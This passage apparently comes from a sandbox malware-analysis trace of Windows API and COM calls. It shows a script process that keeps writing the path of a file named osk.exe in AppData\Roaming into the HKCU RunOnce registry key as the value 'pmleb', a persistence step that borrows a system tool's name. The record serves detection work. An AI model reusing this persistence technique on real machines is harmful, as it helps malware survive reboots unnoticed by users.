HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.196] RegCloseKey (hKey=0x280) returned 0x0 [0092.196] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.196] SetTimer (hWnd=0x20280, nIDEvent=0x21ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ed [0092.196] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.202] KillTimer (hWnd=0x20280, uIDEvent=0x21ed) returned 1 [0092.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.202] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.203] IUnknown:Release (This=0x787518) returned 0x1 [0092.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.203] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.203] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.203] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.203] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0092.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.204] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0092.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0092.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.205] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.205] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.205] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.205] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.205] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.206] RegCloseKey (hKey=0x280) returned 0x0 [0092.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.206] SetTimer (hWnd=0x20280, nIDEvent=0x21ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ee [0092.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.217] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.217] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.217] KillTimer (hWnd=0x20280, uIDEvent=0x21ee) returned 1 [0092.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.218] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.218] IUnknown:Release (This=0x787518) returned 0x1 [0092.218] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.218] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.218] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.218] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.219] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0092.219] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.219] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0092.219] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0092.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.220] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.220] IUnknown:Release (This=0x7a9740) 
returned 0x1 [0092.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.220] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.220] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.220] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.220] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.221] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.221] RegCloseKey (hKey=0x280) returned 0x0 [0092.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.221] SetTimer (hWnd=0x20280, nIDEvent=0x21ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ef [0092.221] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.233] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.233] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.233] KillTimer (hWnd=0x20280, uIDEvent=0x21ef) returned 1 [0092.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.233] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.233] IUnknown:Release (This=0x787518) returned 0x1 [0092.234] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.234] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.234] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.234] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.234] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0092.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.235] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0092.235] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0092.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.236] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.236] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.236] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.236] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.236] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.237] RegCloseKey (hKey=0x280) returned 0x0 [0092.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.237] SetTimer (hWnd=0x20280, nIDEvent=0x21f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f0 [0092.237] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.248] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.248] KillTimer (hWnd=0x20280, uIDEvent=0x21f0) returned 1 [0092.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.249] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.249] IUnknown:Release (This=0x787518) returned 0x1 [0092.249] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
